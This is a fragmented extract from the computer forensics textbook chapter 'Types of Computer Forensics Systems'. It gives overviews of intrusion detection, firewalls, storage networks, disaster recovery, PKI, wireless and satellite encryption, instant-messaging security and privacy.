Auditing of system configurations and vulnerabilities
Assessing the integrity of critical system and data files
Recognition of activity patterns reflecting known attacks
Statistical analysis of abnormal activity patterns
Operating system audit trail management, with recognition of user activity reflecting policy violations [3]
Some systems provide additional features, including
Automatic installation of vendor-provided software patches
Installation and operation of decoy servers to record information about intruders [3]
The combination of these features allows system managers to more easily handle the monitoring, audit, and assessment of their systems and networks
...

Vulnerability Assessment and Intrusion Detection
Vulnerability assessment products (also known as scanners) perform rigorous examinations of systems in order to determine weaknesses that might allow security violations
...
First,
passive, host-based mechanisms inspect system configuration files for unwise settings, system password files for weak passwords, and other system objects for security
policy violations
...

The results of vulnerability assessment tools represent a snapshot of system security at a point in time
...
Because they offer benefits that
are similar to those provided by intrusion detection systems, they are included in
the sphere of intrusion detection technologies and products [3]
...
Products are therefore designed with user-friendly interfaces that assist system administrators in their installation, configuration, and use
...
Many vendors provide consulting and integration services to assist customers in successfully
using their products to achieve their security goals [3]
...
Intrusion detection and vulnerability assessment products provide capabilities needed as part of sound network security management practice [3]
...
One way of
characterizing the difference is provided by classifying security violations by source—
whether they come from outside the organization’s network or from within
...
This is a valuable
function and would be sufficient protection were it not for these facts:
Not all access to the Internet occurs through the firewall
...

Firewalls are subject to attack themselves [3]
...
The
firewall cannot mitigate risk associated with connections it never sees [3]
...
Again, the firewall only sees traffic at the boundaries between the internal network and the Internet
...

As more organizations utilize strong encryption to secure files and public network connections, the focus of adversaries will shift to those places in the network in
which the information of interest is not as likely to be protected: the internal network
...
Therefore, they will become even more important as
security infrastructures evolve [3]
...
A common attack strategy is to utilize tunneling to
bypass firewall protections
...

Trust and Intrusion Detection

Another area of discussion when considering the value of intrusion detection systems is the need to monitor the rest of the security infrastructure
...
Given their vital roles, however, they are also prime targets of attack by adversaries
...
Be it due to misconfiguration, outright failure, or attack, the failure of any of these components of the security infrastructure
jeopardizes the security of the systems they protect [3]
...
Vulnerability
assessment products also allow system management to test new configurations of
the security infrastructure for flaws and omissions that might lead to problems [3]
...
It is an ongoing process targeting a dynamic environment in which new threats arise daily [3]
...
Much of the classic, government-sponsored work in
computer security addresses this area by focusing on the design and implementation of more secure operating systems and applications software
...

Functions in the detection phase are primarily provided by intrusion detection
systems, although virus scanners also fall into this category
...

The results of the detection process drive the other two stages of managing security: (a) investigating problems that are discovered and documenting the cause of

Types of Computer Forensics Systems

95

the problem and (b) either correcting the problem or devising a means of dealing
with it should it occur again
...

The combination of the investigation and diagnosis/resolution phases is often
called incident response or incident handling
...

What Intrusion Detection Systems and Related Technologies Can and Cannot Do
Every new market suffers from exaggeration and misconception
...
Here
is a primer on how to read intrusion detection marketing literature [3]
...
The reason for this is because they monitor the operation of firewalls, encrypting routers, key management servers and
files critical to other security mechanisms, thus providing additional layers of protection to a secured system
...
Intrusion detection systems can recognize these first hallmarks of attack and
potentially respond to them, mitigating damage
...

Second, intrusion detection systems can also make sense of often obtuse system
information sources, telling you what’s really happening on your systems
...
They are also often incomprehensible,
even to expert system administrators and security officers
...

Third, intrusion detection systems can also trace user activity from the point of
entry to the point of exit or impact
...
Expert attackers can often penetrate firewalls; therefore, the ability to correlate activity corresponding to a
particular user is critical to improving security [3]
...
Putting trojan horses in critical system files is a standard attack technique
...
File integrity assessment tools utilize

96

Computer Forensics, Second Edition

strong cryptographic checksums to render these files tamper-evident and, in the
case of a problem, quickly ascertain the extent of damage [3]
...
Vulnerability assessment products allow consistent auditing and diagnosis
of system configuration settings that might cause security problems
...
Some of these
product offerings even offer automated fixes for the problems uncovered [3]
...
Vulnerability assessment products also allow the
user of a system to quickly determine what attacks should be of concern to that system
...
These products also provide a valuable sanity check for those
installing and setting up new security infrastructures
...

Seventh, intrusion detection systems can relieve your system management staff
of the task of monitoring the Internet, searching for the late hacker attacks
...
The firms developing these products have expert staffs that monitor the Internet and other sources for
reports and other information about new hacker attack tools and techniques
...

Eighth, intrusion detection systems can make the security management of your
systems by nonexpert staff possible
...
These are window-based,
point-and-click screens that step users through setup and configuration in a logical, readily understood fashion [3]
...
Many intrusion
detection and assessment products are part of comprehensive security suites that include security policy building tools
...


Types of Computer Forensics Systems

97

Unrealistic Expectations

First, intrusion detection systems are not silver bullets
...
In networks, it is also a “weakest link”
phenomenon (it only takes one vulnerability on one machine to allow an adversary
to gain entry and potentially wreak havoc on the entire network)
...
There are no magic solutions to network security
problems, and intrusion detection products are no exception to this rule
...

Second, intrusion detection systems cannot compensate for weak identification
and authentication mechanisms
...
Therefore, you must still rely on other means of identification and authentication of users
...
A security
infrastructure that includes strong identification and authentication and intrusion
detection is stronger than one containing only one or the other [3]
...
In very secure environments, incidents happen
...
One must investigate the attacks, determine, where
possible, the responsible party, and then diagnose and correct the vulnerability that
allowed the problem to occur, reporting the attack and particulars to authorities
where required
...
However, the intrusion-detection system is not capable of
identifying the person at the other end of the connection without human intervention
...

Fourth, intrusion detection systems cannot intuit the contents of your organizational security policy
...

These functions cannot only spot the high-school hacker executing the “teardrop” attack against your file server, but also spot the programmer accessing the payroll system
after hours
...

Fifth, intrusion detection systems cannot compensate for weaknesses in transmission control protocol (TCP)/IP, and many other network protocols do not perform strong authentication of host source and destination addresses
...
It is difficult to identify who
is attacking one’s system; it is very difficult to prove the identity of an attacker in a
court of law—for example, in civil or criminal legal processes [3]
...
In other words, “garbage in
garbage out” still applies
...
Despite the best efforts on the part of system vendors,
many of these sources are software-based; as such, the data are subject to alteration
by attackers
...
This argues for the value of integrated, sometimes redundant, information sources; each additional source increases the possibility of
obtaining information not corrupted by an attacker [3]
...
Network-based intrusion detection is capable of monitoring traffic on a
network, but only to a point
...
Also, as traffic levels rise, the associated processing load required to keep up becomes prohibitive and the analysis engine either falls
behind or fails
...

Eighth, intrusion detection systems cannot always deal with problems involving packet-level attacks
...
The heart of the vulnerabilities involves the difference
between the intrusion detection systems’ interpretation of the outcome of a network transaction (based on its reconstruction of the network session) and the destination node for that network session’s actual handling of the transaction
...

Worse yet, an adversary can use this sort of packet manipulation to accomplish a
denial of service attack on the intrusion detection systems itself by overflowing
memory allocated for incoming packet queues [3]
...
Dealing with fragmented packets can also be problematic
...
Other problems associated with advances in network
technologies include the effect of switched networks on packet-capture-based network intrusion detection systems
...
This problem can be mitigated in those switches
offering monitoring ports or spanning capability; however, these features are not
universal in current equipment [3]
...
Thanks to government and military interest in information warfare (discussed
in Chapters 13 to 19), of which intrusion detection is a vital defensive component,
funding of research efforts has skyrocketed, with no end in sight
...
Intrusion detection products have now been embedded as
standard components of major governmental and financial networks [3]
...
Also look for products that function at application level and that interoperate with network management platforms
...


FIREWALL SECURITY SYSTEMS
Today, when an organization connects its private network to the Internet, security
has to be one of primary concerns
...
For most organizations now
connecting to the Internet and big business and big money moving toward electronic commerce at warp speed, the motive for mischief from outside is growing
rapidly and creating a major security risk to enterprise networks
...
These firewall gateways provide a choke point at which security and auditing can be imposed
...

The threat of attack on your network increases proportionally with the continued exponential growth of the Internet
...
This book illustrates many reasons why this is necessary, as well as
many techniques to consider for your firewall solution
...
Also, do not
put sensitive information in a place where it can be accessed over the Internet
...

Nevertheless, a number of the security problems with the Internet can be remedied or made less serious through the use of existing and well-known techniques
and controls for host security
...
This section provides an overview of firewall technology, including how they protect
against vulnerabilities, what firewalls don’t protect against, and the components
that make up a firewall
...
The actual means by which this is accomplished varies widely,
but in principle, the firewall can be thought of as a pair of mechanisms: one that
blocks traffic and one that permits traffic
...
Probably the most important thing to recognize about a firewall is that it implements an access control policy
...

In other words, a firewall is a network security product that acts as a barrier between two or more network segments
...
A firewall can
also provide audit and alarm mechanisms that will allow you to keep a record of all
access attempts to and from your network, as well as a real-time notification of
things that you determine to be important
...

Rather, a firewall is an approach to security; it helps implement a larger security policy that defines the services and access to be permitted, and it is an implementation
of that policy in terms of a network configuration, one or more host systems and
routers, and other security measures such as advanced authentication in place of static passwords
...
It implements a network access policy by forcing connections to pass through the firewall, where they can be examined and evaluated
...
A firewall system is usually located at
a higher-level gateway, such as a site’s connection to the Internet
...

Why do we need firewalls? What can a firewall do for you? Why would you
want a firewall? What can a firewall not do for you? All of these burning questions
are answered next for those inquiring security minds that want to know
...

In a firewall-less environment, network security relies totally on host security,
and all hosts must, in a sense, cooperate to achieve a uniformly high level of security
...
As mistakes and lapses in security become more common, breakins occur not as the result of complex attacks, but because of simple errors in configuration and inadequate passwords
...
In today’s world, corporations face a variety of information system
attacks against their local area networks (LANs) and wide area networks (WANs)
...
These attacks come from
three basic groups:
Persons who see attacking a corporation’s information system as a technological challenge
Persons with no identified political or social agenda who see attacking a corporation’s information system as an opportunity for high-tech vandalism
Persons associated with a corporate competitor or political adversary who see
the corporation’s information system as a legitimate strategic target
To combat this growing and complex threat to a corporation’s LAN and Internet site, a series of protective countermeasures needs to be developed, continually
updated, and improved
...
You’ve got password protection on
your servers and you’ve implemented other security measures on your servers as
well
...
An external firewall is used to counter
threats from the Internet
...
The internal firewall is used to separate and protect corporate
databases (for example, financial databases can be separated from personnel databases)
...

Firewalls, however, are just one element in an array of possible information
technology (IT) systems countermeasures
...
The effectiveness of this strategy will
have a direct bearing on the success of any firewall that a corporation builds or purchases
...

Least Privilege

The principle of least privilege means that an object is given only the privileges it
needs to perform its assigned tasks
...

Defense in Depth

Don’t depend on one security solution
...

These layers should consist of a variety of security products and services
...

Do you want to let them even begin to work against your server’s security? Isn’t it
possible that your administrator might go home at night and miss the attack?
Can’t human errors in password security be made now and then? Firewalls are de-

Types of Computer Forensics Systems

103

signed to allow you a very important second layer of protection
...

A firewall approach provides numerous advantages to sites by helping to increase overall host security
...

Benefits of Firewalls
A firewall provides a leveraged choke point for network security
...
The firewall can control and prevent attacks
from insecure network services
...
In this manner, the firewall serves as an auditor for the system
and can alert the corporation to anomalies in the system
...

Some firewalls, on the other hand, permit only email traffic through them,
thereby protecting the network against any attacks other than attacks against the
email service
...

Generally, firewalls are configured to protect against unauthenticated interactive logins from the outside world
...
More elaborate firewalls block traffic from the outside to the inside but permit users on the inside to communicate
freely with the outside
...
Unlike in a situation where a computer system
is being attacked by someone dialing in with a modem, the firewall can act as an effective phone tap and tracing tool
...
Often, they provide summaries to the administrator about what
kinds and amount of traffic passed through it, how many attempts there were to
break into it, etc
...
As a result, the subnet network environment is exposed to fewer risks, since only selected protocols will be able to
pass through the firewall
...
This provides the benefit of preventing the services from being exploited by outside attackers, but at the same time permits the use of these services with greatly reduced risk to exploitation
...

Firewalls can also provide protection from routing-based attacks, such as source
routing and attempts to redirect routing paths to compromised sites via Internet
control message protocol (ICMP) redirects
...

Controlled Access to Site Systems

A firewall also provides the ability to control access to site systems
...
A site could prevent outside access to its
hosts except for special cases such as email servers or information servers
...
Put
differently, why provide access to hosts and services that could be exploited by attackers when the access is not used or required? If, for example, a user requires little or no network access to his or her desktop workstation, then a firewall can
enforce this policy
...
ICMP supports packets containing error, control, and informational messages
...


Concentrated Security

A firewall can be less expensive for an organization, in that all or most modified
software and additional security software could be located on the firewall systems
as opposed to being distributed on many hosts
...


Types of Computer Forensics Systems

105

Other solutions to network security such as Kerberos involve modifications at
each host system
...

Kerberos is an authentication system developed at the Massachusetts Institute of
Technology (MIT)
...
It works by assigning a unique key,
called a ticket, to each user that logs on to the network
...


Enhanced Privacy

Privacy is of great concern to certain sites, since what would normally be considered
innocuous information might actually contain clues that would be useful to an attacker
...
Finger displays information about users such as their last login
time, whether they’ve read mail, and other items, but, finger could leak information
to attackers about how often a system is used, whether the system has active users
connected, and whether the system could be attacked without drawing attention
...

Some sites feel that by blocking this information, they are hiding information that
would otherwise be useful to attackers
...
A firewall with appropriate alarms that sound when suspicious activity occurs can also provide details
on whether the firewall and network are being probed or attacked
...
Of primary importance is knowing whether the firewall is withstanding probes and attacks and determining whether the controls on the firewall
are adequate
...

Policy Enforcement

Lastly, but perhaps most importantly, a firewall provides the means for implementing and enforcing a network access policy
...
Thus, a network access policy can be enforced by a
firewall, whereas without a firewall, such a policy depends entirely on the cooperation of users
...

There are also a number of disadvantages to the firewall approach, and there
are a number of things that firewalls cannot protect against
...

Limitations of Firewalls
Firewalls can’t protect against attacks that don’t go through the firewall
...
Unfortunately for those concerned,
a magnetic tape can just as effectively be used to export data
...
It’s silly to build
an 8-foot-thick steel door when you live in a wooden house
...
For a firewall to work, it must be a part of a consistent overall organizational security architecture
...
For example, a site with top
secret or classified data doesn’t need a firewall at all: they shouldn’t be hooking up
to the Internet in the first place; or the systems with the really secret data should be
isolated from the rest of the corporate network
...
While an industrial spy might export information through your firewall,
he or she is just as likely to export it through a telephone, fax machine, or floppy
disk
...
Firewalls also cannot protect you against stupidity
...
An attacker may be able to break into your network by completely bypassing your firewall if he or she can find a helpful employee inside who can be
fooled into giving access to a modem pool
...
It has no concept
of the value or sensitivity of the data it is transferring between networks and therefore cannot protect information on that basis
...
If a user chooses to modify or
propagate that information, the firewall has no effect
...
It cannot, however, test or

Types of Computer Forensics Systems

107

ensure information integrity before it receives it or after it releases it
...

A firewall cannot provide access control on any of your inside systems from
someone already inside the firewall
...
Finally, a firewall cannot completely protect your systems from datadriven attacks such as viruses
...
There are too many
ways of encoding binary files for transfer over networks and too many different architectures and viruses to try to search for them all
...
In general, a firewall
cannot protect against a data-driven attack—attacks in which something is mailed
or copied to an internal host, where it is then executed
...

Data-driven attacks are those that are transferred as data to the target system by
user applications such as FTP, WWW, and email
...
A firewall cannot completely eliminate
the threat of this type of attack
...

Organizations that are deeply concerned about viruses should implement
organization-wide virus control measures
...
Blanketing your network with virus scanning software will protect against viruses that come in via floppy disks, modems, and
the Internet
...

As previously discussed, a firewall is a system or group of systems that enforces
an access control policy between two networks
...
Usually they can be thought of as two
mechanisms: one that permits traffic and one that blocks traffic
...
A company should not
leave this to the discretion of the service or product that will supply their security

108

Computer Forensics, Second Edition

because only the company knows what kind of protection it needs
...

Firewalls are designed to protect your network from attacks originating from
another network
...

Some firewalls permit only email traffic through them, thereby protecting the network against any attacks other than attacks against the email service
...
A
more effective firewall will allow users on the protected network to communicate
freely with the outside world; this is the reason a company connects its LAN to the
Internet
...

A firewall will not block attempts to break into a network that come from external modems or from internal attacks
...
If a
company has top secret information that it wants to keep secret, it should not connect any machines containing this information to the Internet
...
Most companies would like to have some
kind of Internet access available to their employees
...

Finally, leaks of information are far more likely to walk out the front door of
the office on a floppy disk than over the Internet through your firewall
...
As
distasteful as the idea might be, with disaster comes opportunity, and the disasters
of September 11, 2001, provided a good opportunity for storage networks to show
their value by providing critically important business continuity
...

Today, organizations continue to expose their IT systems to a wide range of potential security threats as they continue to broaden their reach to business partners
and customers around the globe
...


Types of Computer Forensics Systems

109

Because IT systems are only as secure as the weakest link in the network, organizations need to consider outsourcing their data storage security needs to one
vendor, which will help them develop a comprehensive security plan and architecture that helps ensure safe, reliable data processing throughout a SAN
...
Nevertheless, demand for high-availability SANs and disaster recovery technology is soaring as companies realize their IT dependency
...
This
network would be a high-performance implementation, such as a fiber channel,
that encapsulates protocols such as a small computer system interface (SCSI)
...
This is not available
using TCP/IP
...

Storage abstraction refers to an indirect representation of storage that has also been
called virtualization
...
Thus, most
system vendors have ambitious strategies to change the way enterprise operations
store and manage data with new capabilities based on SANs
...
Conversely, in
order to amortize the cost of the storage over many servers, SANs are also being used
to provide increased server connectivity to centralized arrays and tape libraries
...
This solution holds perhaps the greatest promise for
the storage-centric model of computing as shown in Figure 3
...

SANs promise the ability to make any-to-any connections among multiple
servers and storage devices
...

SANs also promise to simplify backup procedures
...
In
other words, SANs allow distributed servers to access a large centralized storage
subsystem for data-sharing applications during an NDR
...
4 Storage-centric model of computing

Devices could also be distributed throughout a campus yet managed from a
central point though a single management tool
...

SAN Benefits
A SAN provides a perfect environment for clustering that can extend to dozens of
servers and storage devices—all the while having redundant links in a fibre channel
fabric
...

Centralized Management

When a disk or controller fails in a direct-attached environment, redundant systems
keep the redundant array of independent (or inexpensive) disks (RAID) array operating normally and generate an alarm
...
Also,
the chances are good that because of human error or inefficient management prac-

Types of Computer Forensics Systems

111

tices, an alarm will eventually be missed and a storage subsystem will fail in an enterprise with a large number of RAID subsystems managed in a decentralized fashion
...
Everyday administrative tasks can be centrally managed
...

Scalability

A storage area network can lower acquisition and expansion costs, in addition to
lowering management costs
...
Without disrupting data access, customers can add storage resources and even servers online
...

Reliability

A SAN is a network that resides between the host bus adapter and the storage device
...
Because monitoring of the network is much
easier now, centralization facilitates more rigorous, consistent management practices and thus increases the overall reliability
...
Current fibre channel connections can support 400 MB/sec and greater
data-transfer rates for faster access to more storage resources than they do for
server-attached or LAN-attached storage today
...

Making it possible to access more devices at one time is another way that a SAN
can improve performance
...

SANs aren’t the only alternative storage solution during an NDR, but they are
the best alternative available today
...


112

Computer Forensics, Second Edition

NETWORK DISASTER RECOVERY SYSTEMS
The high availability of mission-critical systems and communications is a major requirement for the viability of the modern organization
...

How would your company respond in the event of a network disaster or emergency? Network disaster recovery (NDR) is the ability to respond to an interruption
in network services by implementing a disaster recovery plan to restore an organization’s critical business functions
...
In recent years, data has
become a vitally important corporate asset essential to business continuity
...

While the great majority of companies have plans for NDR in place, those without an NDR plan indicate that they intend to create one
...
Staff training is clearly the greatest missing link in disaster recovery preparations
...

Many companies see their disaster recovery efforts as being focused primarily
on their IT departments
...
Not surprisingly, the
person most frequently cited as being responsible for the management of an NDR
plan is the company’s chief information officer (CIO) or another IT manager
...
Network outages are the number-one issue for smaller companies and high on the list
for larger companies
...
Natural disasters also ranked high
...

Larger companies (those with $20 million or more in annual revenues) are
more likely than smaller companies to prepare for events such as hardware component failure versus natural disasters and accidental employee-initiated outages
...

As for components that are or will be part of their NDR plan, larger businesses
are more likely to perform or plan to perform a business impact analysis than
smaller firms
...


Types of Computer Forensics Systems

113

A majority of companies indicate they review their NDR plans every quarter,
but some companies haven’t reviewed their plans at all
...
The data center is the most frequently tested plan component
...

The impact of the loss of mission-critical systems naturally varies depending on
a company’s size
...

Major hardware component failure and a network failure are the most common problems
...
Most companies believe they don’t have to worry about
being offline for long
...

SANs offer the most promising solutions for storage problems today, complementing the other solutions of direct storage, centralized storage, and network-attached
storage
...
The majority seemed to be following reasonably good planning practices,
focusing on major potential sources of problems
...
Thus, there’s a potential disconnect in terms of
perception
...


PUBLIC KEY INFRASTRUCTURE SYSTEMS
To mitigate the security risks of conducting business in an open environment while
at the same time maintaining the cost advantages of doing so, enterprises are turning their attention to an emerging segment of the security market known as public
key infrastructure (PKI)
...
PKI accomplishes these goals for an
enterprise through policy and technology components
...
This section briefly identifies the key concepts and issues surrounding the
technologies and policies required to implement and support an enterprise PKI
...
It is fast becoming essential for effective, secure

114

Computer Forensics, Second Edition

e-commerce and to fulfill general security and authentication requirements over
nonsecure networks (like the Net)
...

PKI Defined
A PKI enables users of an insecure public network such as the Internet to securely
and privately exchange data through the use of a public and a private cryptographic
key pair that is obtained and shared through a trusted authority
...
PKI is the underlying
technology that provides security for the secure sockets layer (SSL) and hyper text
transfer protocol secure sockets (HTTPS) protocols, which are used extensively to
conduct secure e-business over the Internet
...
Traditional cryptography involves the creation and sharing of a secret key
for the encryption and decryption of messages
...
For this reason, public key cryptography and the PKI is the
preferred approach on the Internet
...
It has been adopted by the popular Web browsers
and is widely used for one-off business-to-customer (B2C) transactions
...

Large-scale PKI implementations therefore demand careful planning and management if goals are to be realized within the desired timescales
...


Types of Computer Forensics Systems

115

WIRELESS NETWORK SECURITY SYSTEMS
It’s an epidemic waiting to happen to many security experts
...
Businesses will have spent $60 billion
on wireless communications services and wireless network security by the end of
2005
...
S
...
That’s good
news for employee productivity, but bad news for companies ill-prepared to head
off wireless network security breaches and debilitating viruses
...

That’s about to change
...
They expect to see
3
...
With that, you get a fullscale epidemic in the works
...

The wireless world, with its often-incompatible alphabet soup of standards,
may be new territory for many IT managers
...
They’ll soon need to think again or face threats that
could wreak havoc
...

Among them are those that head off problems on a wireless network level, within
applications and on devices
...
S
...
Nevertheless, one virus that did hit U
...
handhelds was known as the liberty virus
...

The virus wasn’t devastating for people who regularly back up their PDA information
on their PCs
...
One virus was distributed in Scandinavia as
a short message
...
In order to get their phones fixed, users had to take them in to their service
providers
...
One incident in Japan caught the attention of wireless operators and software companies
around the globe
...
nttdocomo
...

When customers clicked on the link, their phones automatically dialed Japan’s
emergency response number
...
For example, similar viruses could be unleashed that might flood a company’s call center
or cause phones to dial a 900 number
...

The threat of data theft, perhaps, is more alarming to businesses
...
The developers of standards such as the wireless application protocol (WAP) and the
wireless LAN 802
...

Because the wireless network is essentially everywhere, sniffing is an inherent
problem in wireless
...
The problem is that with wireless, they don’t
even have to be in the network
...

The widely used wireless LAN standard, 802
...
Still, there is some hope, because developers addressed wireless network
security from the start and are working to beef it up before wireless LANs become
more pervasive
...
There will be
attacks on the devices themselves, but they quickly will be focused on transactions
...
Typically, you should look to the past to predict the future
...
Each time software companies release popular technologies in the PC environment, people use them to write malicious code
...
For example, a Windows program can currently run on a
Windows Compact Edition (CE) device, but CE doesn’t yet support macros
...

Wireless devices are rapidly developing other capabilities
...
There’s more of a chance of things being used improperly as you create
more functionality
...
NTT DoCoMo, for example, opened its wireless network globally in 2003
...

Also, the more capabilities supported by devices, the greater the potential for
viruses to spread between PCs and mobile devices, which could enable viruses to
spread very quickly
...
Then viruses can spread easily
via email or programs that synchronize PCs and handheld devices
...

Thus, as 802
...
The basic 802
...
For wireless networks with high security requirements, the weaknesses in WEP encryption require
a more robust solution
...
For larger wireless networks, or for networks with high security requirements, a VPN solution based on currently available technology provides a
very scalable solution for 802
...
VPN for wireless is also a logical extension of the remote access VPN capability found in most large businesses
today
...
1X, a standards-based solution for port-level authentication for any wired or wireless Ethernet client system
...
The reason might lie in the
use of fairly simple attack tools that have dominated most DDoS incidents
...
As defense
mechanisms are deployed to counter these simple attacks, they are expected to be
faced with more complex strategies
...
Unfortunately, their results are not yet available
...

Nevertheless, DDoS attacks are a complex and serious problem, and consequently, numerous approaches have been proposed to counter them
...
This chapter is a first attempt to cut through the obscurity and
achieve a clear view of the problem and its solutions
...

One benefit of the development of DDoS classifications has been to foster easier cooperation among researchers on DDoS defense mechanisms
...
The Internet community must be equally cooperative to counter
this threat
...
They will also clarify how different mechanisms are likely to work
in concert and identify areas of remaining weakness that require additional mechanisms
...

The preceding classifications are not necessarily complete or all-encompassing
...
As defense mechanisms are deployed to counter simple attacks, we are likely to see more complex
attack scenarios
...
Thus, these classifications are likely to require expansion and refinement as new threats and defense
mechanisms are discovered
...
The ultimate value of the wireless network security technology described in this section will thus be in the degree
of discussion for the next computer forensics system, known as satellite encryption
security systems
...
The ability to securely exchange information between billions of users around the globe involving perhaps
trillions of transactions is vital to the continued growth and usefulness of satellite
communications as well as the Internet and intranets
...

This section shows how governments and organizations around the world can
use satellite encryption to help preserve vital national secrets, limit attacks on a nation’s information infrastructure, and eliminate security and authentication obstacles to electronic commerce
...

Current and Future Satellite Technology
A look at the potential threat to these orbiting systems from the Internet is of the
utmost importance before covering how to use encryption to best protect them
...

High-Tech Mayhem

Attacks on satellite systems regularly fill plot lines of Hollywood movies
...
S
...
S
...

Such incidents could be all too real in the near future
...
A serious threat is sure to evolve if the international community doesn’t
take steps now to protect these systems in the future
...
For the sake of
public trust in the Internet, an infrastructure must be designed to support the safe
use of land-based communication links or ground stations (called gateways, they
connect terrestrial networks with satellite systems) as shown in Figure 3
...
Systematic mechanisms and protocols must be developed to prevent breaches of security
while transmitting data to (uplink) a satellite or receiving (downlink) data from it
...
5 The low Earth orbit (LEO) network
...
All of
these protection mechanisms are designed to ensure that only an authorized person
can gain access to systems and alter information
...
For instance, some tools
check the records (called audit logs) of system behavior, while others examine user
activities on the system as they occur
...
If the messages traveling over the
Internet via satellite connection can be modified en route, the message Jeremiah receives need not be the one Lisa sent
...

The attacker can then read the messages on this intermediate satellite site, change
their contents, and forward them to the original destination as if the intermediate
site were legitimately on the message’s path—a so-called odd person out attack
...
6 The path of a public-key-encrypted message
...
With this scheme, if Lisa
wants to send Jeremiah confidential mail, she enciphers a message using Jeremiah’s
public key and sends the enciphered message to him as shown in Figure 3
...
Only
Jeremiah, with his private key, can decipher this message; without that key, the attacker cannot read or change Lisa’s message
...
Thus, Lisa would
encipher the message using the attacker’s public key and send that message to Jeremiah
...
Jeremiah receives the altered message, deciphers it,
and the business deal goes sour
...

Suppose Lisa uses a Web browser to view a Web site in Italy
...
” When she clicks on the link, an applet that scans her system for personal information (such as a credit card number) and invisibly emails it to the attacker is
downloaded along with the image
...
This trust in implied situations
(this program only does what it says it does) is violated by computer programs containing viruses and trojan horses
...

The ability to securely exchange information between two users or between a
service provider and a user via satellite connection is vital to the continued growth
and usefulness of satellite communications as we approach the next millennium
...
5
...
However, secure exchange can be either a one-way
or a two-way encounter, and the satellite encryption requirements and strategies
are quite different for each
...
Although email messages are frequently answered, each message
transmission is a unique, stand-alone event
...

Client/server applications, Web exchanges, and many other online applications
typify the second class of satellite communications and Internet exchange: two-way
transactions
...
For these two-way transactions, there are again two main
security concerns: first, the service wants assurance that the user is not an impostor but
actually the person claimed (authenticity)
...

Although these concerns seem similar, the solutions are quite different
...
PGP is a widely used email security
package for one-way transactions, while Kerberos is a widely used client/server security package for two-way transactions
...

Pretty Good Privacy

PGP uses the RSA (Rivest, Shamir, Adelman) public key encryption scheme and the
MD5 (Message Digest 5) one-way hash function to form a digital signature, which
assures the recipient that an incoming satellite transmission or message is authentic—that it not only comes from the alleged sender but also has not been altered
...
The sender creates a private message
...
MD5 generates a 128-bit hash code of the message
...
The hash code is encrypted with RSA using the sender’s private key, and
the result is attached to the message
...
The receiver uses RSA with the sender’s public key to decrypt and recover
the hash code
...
The receiver generates a new hash code for the message and compares it to
the decrypted hash code
...

The combination of MD5 and RSA provides an effective digital-signature
scheme
...
Because of the strength of
MD5, the recipient is also assured that no one else could have generated a new message that matched the hash code and, hence, the signature of the original message
...
In both cases, PGP uses the confidential IDEA (international data encryption algorithm) encryption algorithm
...

In any conventional satellite encryption system, one must address the problem
of key distribution
...
That is, a new
key is generated as a random 128-bit number for each message
...
The sender generates a message and a random 128-bit number to be used
as a session key for this message only
...
The message is encrypted, using IDEA with the session key
...
The session key is encrypted with RSA using the recipient’s public key and
is prepended (to prefix a string or statement with another or to place a
word or set of numbers in front of an existing word or set of numbers; for
example, to prepend “sub” to “net” would yield “subnet”) to the message
...
The receiver uses RSA with its private key to decrypt and recover the session key
...
The session key is used to decrypt the message
...
The common misconception holds that each user simply keeps
his or her private key private and publishes the corresponding public key
...

An impostor can generate a public and private key pair and disseminate the
public key as if it belonged to someone else
...
Meanwhile, Mark has generated a public and private key pair, attached Shawn’s name and an email address that Mark can access, and
then published this key widely
...
The result

124

Computer Forensics, Second Edition

is that Mark receives and can decrypt the message, Shawn never receives the message, and, even if he did, he could not read it without the required private key
...

The essential elements of a public key certificate are the public key itself, a user ID
consisting of the key owner’s name and email address, and one or more digital signatures for the public key and user ID
...
The digital signature is formed using the private key of the signer
...
If any change is made to either the public key or the user ID, the signature
will no longer compute as valid
...
In fact, it is the public key certificate that makes distributed security applications using public keys practical
...
Whether
the Internet or satellite communications become more secure depends entirely upon
the vendors who sell the systems and the organizations that buy them
...
To begin addressing this challenge, IT managers need to
Get to know the key emerging vendors in this field
Begin learning about how public key cryptography is being woven into the soft
infrastructure of the Internet and satellite communications—and by extension, into intranets as well
Prepare to respond to business requirements for detailed, real-time measurement and reporting of document usage within the organization, as well as the
use by outsiders of documents created within the organization
Spend quality time with business unit managers, educating them on these new
technologies and brainstorming applications that make use of them
This section provided a brief overview of the current satellite encryption policies, the threat from the Internet, encrypted satellite data transmitting (downlink)
and receiving (uplink), and encryption cracking
...


Types of Computer Forensics Systems

125

INSTANT MESSAGING (IM) SECURITY SYSTEMS
The security threats from IM are straightforward
...
With the public IM networks, the individual employee registers for service
...
Furthermore, without additional tools, the company has no way of archiving IM messages
for legal or regulatory purposes, or of monitoring and controlling the content of messages to filter for inappropriate communications
...
Each
of the IM networks uses a well-known port that must either be left open on the corporate firewall to allow traffic in or closed, which, at least in theory, bans that service
to end users
...
One downside to this strategy is that because workers find IM useful, blocking it isn’t popular or necessarily even a good
business move
...
If the IM port has been
blocked, all the popular clients today are designed to fall back to port 80, the Web
port, and that’s usually open
...

Given IM’s pervasiveness, enterprises can’t think about security in a vacuum; it
has to be part of a larger management structure
...
Products also can examine
message content much like existing email spam filters
...
Besides addressing
security, this architecture puts the IM management and security vendors in a position
to deal with the pesky problem of the lack of interoperability among networks
...
Vendor representatives are surprisingly open about
their reasons: IM as a stand-alone application gets commoditized pretty quickly
...


126

Computer Forensics, Second Edition

NET PRIVACY SYSTEMS
The philosophical focus of a privacy management perspective is geared toward the
improvement of the bottom line for private companies and cost control and resource optimization for nonprofit and government organizations
...
Although this balance is essential in an information intensive world, it is clear that it is not going to be easy for organizations to achieve
the balance between privacy and the optimization of resources
...
Privacy protection for the individual was born with democracy and was originally designed to keep oppressive
governments from intruding on individual freedoms
...
People still have
every reason to keep a tight reign on snoopy governments (like the use of the Patriot Act), but now they must also be concerned about the commercial violation of
individual privacy rights and desires
...
This has raised considerable concern
among privacy advocates
...
Most for-profit companies, government agencies at all
levels, and even nonprofit organizations collect large amounts of information about
the people they serve or seek to serve
...

Managing Privacy Is the Business Challenge of the 21st Century
Protecting the privacy of enterprise information, data on customers, and corporate
trade secrets has become a major concern for managers in all types and sizes of organizations
...
Surviving the chaos surrounding information
privacy requires a comprehensive company-wide privacy plan
...
S
...
It is not likely that this debate will end anytime
soon
...
The Internet has compounded the difficulties enterprises face
in managing privacy efforts
...
Industry analysts project that by 2008, there will be approximately one billion Internet users worldwide
...
First, the Internet has resulted in a huge increase in the number of people
using computers to seek information and make purchases
...
Notably, in late
1999 and early 2000, Web technology that tracks how people use the Internet came
under fire
...
They range from small new Web-based companies to
